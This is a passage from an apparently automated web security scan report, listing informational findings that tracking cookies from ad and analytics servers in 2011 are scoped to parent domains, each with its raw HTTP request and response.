Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=MLv38yMNYS5n556rUdZEx/o5eypOaEu8COAR17ri5FFJ0FR/DCVho1i888MpWECz+KvddW96x+ZWMrHZZuFYWRdi0Ttiyn6zmLDSlA1uK95C57yGzucOrJqdmL6fFrDcpSvmOSk7BOclNUt7RWlHZoyNrt1GLRfxm3bRtuo2CfyPwIJ/yXIAQjMu7i9OMYPewidKA0q1/0uUpVDAPnfPRNdmew//1T+ZotabTg8c6ayt0ayU5KxhIlMO0zhOP+L3247oh64Wc2CGn1MgWnIHe9nWSStP+vc6kJiQpsVud+5ttYUkKtL8m1QBsvc2/MfTrSmJXnI0dWUX75l0GP8iD+KrsfI2MNrGUtVIQ+uZpa5N+rfJ3lseYi9c8QjhAvNpVCtRO9ENE5mMruL7893kOpOAY7IcULkyGYGsBCxY4sI+d66lxNMlDF6k5UXCb8knlYN/Ww8/EpdaqhzyZL8eG/1Dj0jowZw0Nb+vX8bLorj2cXoM5TKooNjNwtfIyY/oCL0URLzpE+ULxxBO1PzzSumsnbQQckx94LUaOrT7yu7lzVJmdz68WyvKoVQZN8Yb/mxU8hMOrTYTuin/4XutORAJHPqgXVVZMUEu/kYIQ6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_J2oN="MLsXr98vcS5joAD3cWnZ721d3dwfAkc/Tt19ScOXuJhsJj1VICFOTaSsJz+o5AVFSd5d5nukIsBNoGXZdCBjO15pPM6fr8NPSbzITptnkS5XSzX1VqnnMPH+QuW+krT+lyL6llVLfSIBFwhYT8pyv7GyjPjKk5AxwnYU9QICR9Wxo6vBHRwRP3tutfdmXfWDDdtOQGmErgzBerB861ViE+7n4hEyL20zETu3OdoXssCZbkxqLWdiKWf6YDUIvUV4CFfQqtBnBt6djprdkXpj4SoMDwnaC+EnhqFUI0RpzTXbKArslQ0oUX7WoAF4Af3zBghd3WHUeFyuhe+UsvFEEHLd8HQmwuTF+jVgdKlfNvV/pC/IIne8MRwVX0AjUXIHY7Pn5El1xoGGG9dXzLmfjZTb3T6zuw9kpPa1"; rsi_us_1000000="pUMdJE+jMAYYlW2ENhuq3soHteb7J7RYdxLy/lJT87u7mVRnNRJQoSEiKXEwhQFpkUH9FP70YBJUyeMsKokupCpkNAqGBWeD2WM/bk7l5xd25e0y+ix1bWUfqFPMt4Ra0+I8MJVwuG0bf9vn4fQdGiwg6WnLAVuwjfo+LLc6FOjcF1pARpPpVf1t8GJcgXgZqGD4mfomxrl4raqFlvmpW3mCZn0JtNgr+yM6Eh/JTRJyDe0oCowgeBBAG6+Xf6gDVS2RPzWVHYpGlYl3PyandpWIaymu3gGgKwA1yXTI6v4Nkd6tas2NYti133B2rA5s6l7gLqJkoZXHPSqWmzw9ONeIQllr9jPz8ggWi/S3JmIsYeVk5IfQ2wlpR9gVd2TFYgsI9s+RZ20e0XDMaGcg3JqM/wuDmn+Wub0A/AvcCtN+EgNvtMWW3y84nOqAAnEa6tEXs6cNZjpO7StgJpoDpkVKZVGLKfEh9jQ9l6nSzsx6DyjuvkxCgsa46ly6asrbWe+oydY8ZrVEY72hYeXDSU2aNEVlxRAtYO/++w9EP+ePXijRqY7biGhjDgmgbaO2GNbiffH3K0XXFC4ivqazqa0mYAxHwEkyDTcuZUkjuS0U4swGvTPnSRQ8ctMguTsP3MXkhBBle0SWqyNObxw6BSJHcAEva8Aywxo7Im7hG3C//7xvHLuvweTAEAtq1RGzg2PCmuu8Y6QRKWJqVRxAnwvNGM+FpcP/8Ir28/iz06imcQMug/OgNlMKedDlT1HVV9sly7wnwNHKuJVDpVUb8NTQhrRQmDqSpJpdJn794JnJXLhivCBU0WzWeHPbOEHBIl5z45JWeVQIhp5n9Y8imWjo+voAjhA9vRU9f9UAjWnb+iNhP/VDIBqiW/h5H1lN2DlLCBlxtfP7Nth6C/TTvWSmjMT/wh0v8yJwjPizFzD5CRmiwbk981fFD7w5YAQ7KBRZwMiLN2H7rfW/kJ2not+CMUBQUZbSZUiCeNX15LwpC1UB9nhag6sjBKCHJ3qEzFNmCq59wEBQI61ewA=="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_J2oN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_J2oN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_XL8A="MLsXr98vcS5joAD3cWnZbLvzpTlezxNylzFx7q/7jh3vp9AaQ0d9+wVZnSqvgBJz6voGf2x+1fpmGHNyJJCc8TFdOsHamNJWhf4O0G6mx0DiILH1ZGJvIbhbNj3WyjYITNbuu5a9TenNAo5w+V+jEwjMs0buh+LSM9MW0LocGLfbs2JngdI/0hoqLc+4c/4njp7KcyDdtqAZMSdSszG+gH0nvDhtaDXsHq2y65tYaObosUQZbnlscgHkfcZA4xP0oaQn/Fk1T3+bmy4DPWztFWhmf4YZDOa/5QfHuiA/TX71vlEf6aI/aHjCv/MxOl2MsIIxayf3UdTycXnHYI/GWT9wffWhWU0eeTJnYV3VYkfv9hZ8KsDEgeYwuYIaQ7dy+PYFN20XN9IPmBbG0qWKpaCMp6bmTsct69E="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJE+jMAYYlW2ENhuq3soHteb7JxbCW7w++Pj1nwUVKp5hB0gjwRK5ilR9rYtu+8vdt1RHZP3c/7mqm1m83nE+btDWInXJ8Oj/6AvXXwanym9a9EOO6FFfbKJMGot66KlgRINwareOVIA47DpDddVt41B/2lZDvlXfqyquFT/raL2+bRtNAthCPn7y62D/SpWVGx8RNgDmIj5Yq0euDif+TNGrkAuvQsi/mYwbmgPK2IOWvD2jwg0Yp1tlZNBoLMbfiex2Zl4CXC35bYVivuYYx7VVLswcQ1f1IUJRS0BV31nSjeVF9/i1bzcrkg5r6JCmXM3DqOcky83D+OCzMYAFF/KlMDverAlYjk3oFt8ANMxorn1kr7jMwpy2Bw2U0mqC8xdltTXOtatQFAz/IV4IfBXJ06eI+yumva7mqy1Wk1pMuWSGP5FzeQHic1omrIQI7nLti10sFPz45YNec6XtAETkLs4MrS7F/mWIGZs0BVWb7mIA03xQ7zaLFmmgZA12uHXVDC6gV6smrutzBGpONeRN+LLR/l/NJOPApKr4HufQlUic+onWy9BWBBBVshcAi/LnvU1deB5UtYJ5C7P5+Ir3OpuLKlHgTTGmttpgL0VyXzDTMGfmjw5nw6zHe7hT/J4H1mUfavc81BOR6/bA0W84f3ttHP+78/klTg4/21zAkMFVw4BGQZdNmIkquX4XxIwabvH1pK8WBPgdch/U/EZyOF16cXgTWxP/xYB1xLrHxBqcmkC5HQR2QiGa4uTBr7Y09xNC7YlVLARKqLG90a+1+qeX/YToe9W//bNA9k3rMcOljXmv00m0RFbXV850JXTnsHYtB7u9az8hbvzNEfdjDjskSOFAYILVnxSgKnS47RV5rbb72HpQY8E9W8iPZV2IL3+BjNqNnwC/rBme5hEvKkzrDFL4jK8+bvq2H4uQgKZnm7rHc8IvtATBeaHtmPphjkIZ5xGGkKNe8ucCb+DlloYbeDx8ip3v7KItXy99q+0Sze0BMf2PRL6MzslKqwCzgkZfyplekA=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 16:03:24 GMT


17.30. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=MLv38yMNYS5n556rUdZEx/o5eypOaEu8COAR17ri5FFJ0FR/DCVho1i888MpWECz+KvddW96x+ZWMrHZZuFYWRdi0Ttiyn6zmLDSlA1uK95C57yGzucOrJqdmL6fFrDcpSvmOSk7BOclNUt7RWlHZoyNrt1GLRfxm3bRtuo2CfyPwIJ/yXIAQjMu7i9OMYPewidKA0q1/0uUpVDAPnfPRNdmew//1T+ZotabTg8c6ayt0ayU5KxhIlMO0zhOP+L3247oh64Wc2CGn1MgWnIHe9nWSStP+vc6kJiQpsVud+5ttYUkKtL8m1QBsvc2/MfTrSmJXnI0dWUX75l0GP8iD+KrsfI2MNrGUtVIQ+uZpa5N+rfJ3lseYi9c8QjhAvNpVCtRO9ENE5mMruL7893kOpOAY7IcULkyGYGsBCxY4sI+d66lxNMlDF6k5UXCb8knlYN/Ww8/EpdaqhzyZL8eG/1Dj0jowZw0Nb+vX8bLorj2cXoM5TKooNjNwtfIyY/oCL0URLzpE+ULxxBO1PzzSumsnbQQckx94LUaOrT7yu7lzVJmdz68WyvKoVQZN8Yb/mxU8hMOrTYTuin/4XutORAJHPqgXVVZMUEu/kYIQ6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_BFfo="MLsXr9EvcS5joBDnTrInbrvzpTlezxNylzFx7q/7jh3vp9AaQ0d9+4VlnSrvgBJz6voGf2x+1Z6RdS2pI5TjgfZ77T3M2t7X2iBHBnAKpH5maLzmozIHYGm7ZsUgnorFipEdgxPJ/VuCSUSeSzr0fhvZs1RpQ2eynAXm+ZYRA0lY99PWYzTVxA+dgG4eyEo6fI6nOFv7VETg9VbOEYxF1bxw9rxFW2/VYfto5WLdqS8AVUs4gxrGXxowSUIPPw4TaPajZMsEG9QysBpXO9+vMJzhH7J7pRXm6jp5YWVv1nqFVwl5k//RXPfOpv8fCdS04EgjnPjAmJGexMwDpJoGPjBw2JOksGDgcEossWHD46TEJ5Ur3vHnDUTUWzfCTfvl2X7FBShnd/mjEZgT/74wiYnRHCJHCNJv/RnwYw=="; rsi_us_1000000="pUMdJE+jMAYYlW2ENhuq3soHtWbj6GKPTeto2o206rx7XdHqk2MHqUdc4h3G8jE1Gdx1SeuNf4n9FXqajQPusTp1Jcs8ZjfglfknWAN/Q1IfyZw5h0t1bS95yIeZFtkPXSC2LxApOiqcQjM6vzFrEqEYTBt+vGOrPGvAgmk6EujcF1pARpPpVf1t8GJcgXgZqGCYmfomxtXdEgF5VKMZEFWBmbNUKntEp+ukrNGGBkXCmINvvD2jww0YZ7hmZNBoLNjfcex0Zl4CJC36Z4USPuYYx7VVLswcQ1f1IVJRi0dVP1rSjeVFf/+1/xUY2A6W6SqbcuheULZgHUExIivYRsyPM4kPKIi65s9jlw8b0ygRfbJv54fQ2wlpR9gVd2SFYgoO7k+RZWUd0XDMaGcg3JqM/wuDmnuWWb0A4COsclOeEQtHtMWW3/snkkNcgVm7VDJfkCm6cjOTrvlOItggKPIusbL1l9SCaB99VdIjRitqqb3WE8ef2luiUylYJxjwzBtb+QBbLiC7/pZjNWAycY5tP/aRFsAiCBupTjGYjm2g0lHMDqDrmlPMoscSYxhTTPv0KuN3m/EHY62T5Ybif1g+5CbvHd48MQZdo4gIxa2ziYKirixPgI/vnDwea4BL4iinQWN+AIncp4UYoiLCWtpcrIRtS9MgPS6DIFnjQGyv2+z+jIrmAoHMMiwl2RATjCQeV+rkFcTCsGNYksONovJdR5NKAGZWNoFpiSfZPYB1taJHpApkWWC5HQR2TSEsOPvnrTO97GqGy3v+4KyaxwMFuCLHS2kq0YgKXQMBA7NAdk77MeO9hTm31Gm0RKqWr8kM45JW+VUIho7H9Y8jWf7dAfdzDjskSOFAYILVnxSgKnS47RV57TZ72P1HE0E82c+PZVqML3+BjNrt1HwJ5CeCU3tHXiQJc2q8DAT4Eh6R5wsQQa1LW7rHc8JX9ATBuaDtmPphjkIZ8U0vbrZ9Ik58JYB0K4lccxDWK7o1rKItXy97q+0Szc2/Ipa3ZbyO1slKuyCzgqZbam9cmA=="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_BFfo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_BFfo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_btY7="MLsXr98vcS5joAC3cWnZbLu/LxacmO6l/ARkBxpP1JJrJebK5u0oIec5hQtxppxsRjkmyEG97JGtnHKzbcarrWXvOcKbltf7xkGa+l8zg6NsPWUKQV5HJAXQeFCR30Ociq0ao4q/grq6lsLC0KtAAADMs0buh6LSM9MG0LIcGHe70yIHgew/Eh0uLc+4c/4njp7GcyDdtqAZMSdSszG+gH0nvDhtaDXsHq2y65tYaObosUQZbnlscgHkfcZA4xP0oaQn/Lk2j36bu66uGkRrS4CsiWzoeFXOeaMh4yHFMNx7MqLYBUYmEVrbUD55ScTBefUUF0U4E7w5UEa9kMK7iC9gTmt3xw0L/2hRO9SwVqZNP64GcOJoZDuIezY3VtCazAUM7wNTb7K0tPc0/B538LlHHOIWHyDI6Pcx"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJD9HMAYYlW23lB1elXr9hifjv2rR/V4c+8rGrfYpD4E7DYk/sDOMiD26ze9j90z9N83XdjZt9ZtbR0ijMugza0Qe5pDvWTr6P4O2VQdjPWf6987WWc8u5KEGwpBscqKQZ1BB2LCvdm6n578p4Rvu6q0mDJHnkT/2jbqILCYLacH0wg0BO/PRs5ivndkckUxb3rhBm6zdK7VzeQeU44tgNRzskkGjN35lToNd85zTK6Vj+9BBbxpbelASsgX6/CR8Y5xVC8aI0ZxOO9+xP1LJ2VtAHTZTiV00au+sbBtvKMxT926tMzK0H5cwsw+g/cYgBE0rDkLsCjUxh6FLjC7i6EMGwHUbcgJhoCDKlItJyK8FU8pMQoukW4Ksl1ZOpqZ7GC0HHNVqD6t3U32r9sbTyZkKK+QA8JjzMDrdR4tTUP2OU1HeXuSVxv1yl+5/L2aqQXy3rE21OIbAG0Txff9Q6+QE4SRR2rr8yhSPM8aOTW2BlGO/zv4pDbki5ENYG1rAwHxPcsScK1CIu7nP426FZdWFs4e21wjcqJyCbd5JPJ40ccpki7u1RrKAV+CG6LFFkj53H1SCrbYfOIRrLfH5rh4eL0cfZ/vrFCCr/HEZmnQwfSO4bhpS1mYMFRTXljVGrQBXZP23w1g4SB2h2r6MHc5Pzt36KPxeMWOL5008JyU50uBQkV+DdYK4Gk+NchyAu4bzHS5mv/nQZXciumcSgzF8+UUvGNyoCfGNhSTai5t86Aacd0zjGzqDaj+g6z+b8nem9ZIkW8qaa0CMbJFNkcqd6zbZHfm4bwKc4OXmjNFwXw/aqQPgXGZdNiAABShzNlnnILNvQI/L4iLNmM8NLZISUdj8Bywe/xU4CPbov0NZunyZnU87RNKIJ8ju6qLTygwGnjEmKh4STE2cZsDOvcNSCTjfRSj9TWHSYPlOxGSR3K91I2CEvVf/GjySVjhJlm3bhym+JGHVNPjKwzs0PgWWBuKLIQBlJoyq1iJREoGQ2gRM+eiMu3rkpU9zbDFvwNQMS8je4aRvBwY="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 03:08:31 GMT


17.31. http://adserver.veruta.com/track.fcgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.veruta.com
Path:   /track.fcgi

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /track.fcgi?ifmode=1&rand=1303691584172&merchantid=3742872422&eventid=0&search=reputation%20management%20%20%20online%20reputation%20management%20%20%20reputationmanagementconsultants%20com HTTP/1.1
Host: adserver.veruta.com
Proxy-Connection: keep-alive
Referer: http://www.reputationmanagementconsultants.com/?utm_source=google&utm_medium=cpc&utm_term=keyword&utm_content=search&utm_campaign=RM&gclid=COXtr8e1tqgCFYLc4Aod_H_yBQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 25 Apr 2011 00:32:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Thu, 01-Jan-1970 00:00:00 GMT
P3P: policyref="http://www.veruta.com/w3c/p3p.xml",CP="NOI DSP COR NID"
Pragma: no-cache
Set-cookie: ueid=1528544390|1303691572|2|2; expires=Tue, 24-Apr-2012 00:32:52 GMT; path=/; domain=.veruta.com;
Set-cookie: cmid=; expires=Tue, 24-Apr-2012 00:32:52 GMT; path=/; domain=.veruta.com;
Content-Length: 65

<html><head><title></title></head><body><div></div></body></html>

17.32. http://altfarm.mediaplex.com/ad/fm/14302-119028-29115-1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/fm/14302-119028-29115-1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/fm/14302-119028-29115-1?mpt=[CACHEBUSTER]&mpvc= HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0RHDjk2rJk_401783982.html?rtbhost=rts-rr10.sldc.dataxu.net&btid=NERCNDQwOUMwMDAwODcwODBBRTU2N0EyMzBBRDNGQkZ8R0ZkTjZCUkZycHwxMzAzNjU4NjU0MDYyfDF8MEY5SUVVUHozanwwUkhEamsyckprfEVYXzEwMjM0NzcyMDZ8MjY2NzYw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAnAAAhwgK5WeiMK0_v1fWmDwcBhlvtoikzg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY5SUVVUHozag&ciu=MFJIRGprMnJKaw&reqid=NERCNDQwOUMwMDAwODcwODBBRTU2N0EyMzBBRDNGQkY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=266&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; mojo3=12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=14302:29115/12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; expires=Wed, 24-Apr-2013 4:32:52 GMT; path=/; domain=.mediaplex.com;
Location: http://img.mediaplex.com/content/0/14302/119028/revised_60days_baker_728x90.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-29115-1%3Fmpt%3D%5BCACHEBUSTER%5D&mpt=[CACHEBUSTER]&mpvc=&placementid=14302119028291151&
Content-Length: 0
Date: Sun, 24 Apr 2011 15:30:18 GMT


17.33. http://analytic.hotelclub.com/b/ss/flairviewhcprod/1/H.17/s84063693960197  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://analytic.hotelclub.com
Path:   /b/ss/flairviewhcprod/1/H.17/s84063693960197

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/flairviewhcprod/1/H.17/s84063693960197?AQB=1&ndh=1&t=24/3/2011%207%3A9%3A50%200%20300&ce=ISO-8859-1&ns=flairviewtravel&pageName=Homepage&g=http%3A//www.hotelclub.com/&cc=USD&ch=Home%20page&server=www.hotelclub.com&v0=0&events=event7%2Cevent19%2Cevent4&v2=EN&c3=www.hotelclub.com&c4=EN&v5=www.hotelclub.com&v12=Non-member&v21=www.hotelclub.com&v29=USD&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=980&bh=907&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: analytic.hotelclub.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-2165807168.30147192:lv=1303643390479:ss=1303643390479; s_cc=true; s_lp=yes

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 12:09:49 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DA098605162390-600001A0A001BFE4[CE]; Expires=Fri, 22 Apr 2016 12:09:48 GMT; Domain=.hotelclub.com; Path=/
Location: http://analytic.hotelclub.com/b/ss/flairviewhcprod/1/H.17/s84063693960197?AQB=1&pccr=true&vidn=26DA098605162390-600001A0A001BFE4&&ndh=1&t=24/3/2011%207%3A9%3A50%200%20300&ce=ISO-8859-1&ns=flairviewtravel&pageName=Homepage&g=http%3A//www.hotelclub.com/&cc=USD&ch=Home%20page&server=www.hotelclub.com&v0=0&events=event7%2Cevent19%2Cevent4&v2=EN&c3=www.hotelclub.com&c4=EN&v5=www.hotelclub.com&v12=Non-member&v21=www.hotelclub.com&v29=USD&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=980&bh=907&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Sat, 23 Apr 2011 12:09:48 GMT
Last-Modified: Mon, 25 Apr 2011 12:09:48 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www605
Content-Length: 0
Content-Type: text/plain


17.34. http://ar.voicefive.com/b/wc_beacon.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1303646989.757,wait-%3E10000,&1303646994271 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/common/adRevresda.asp?channel=home&Section=main&adsize=728x90&pos=bottom
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
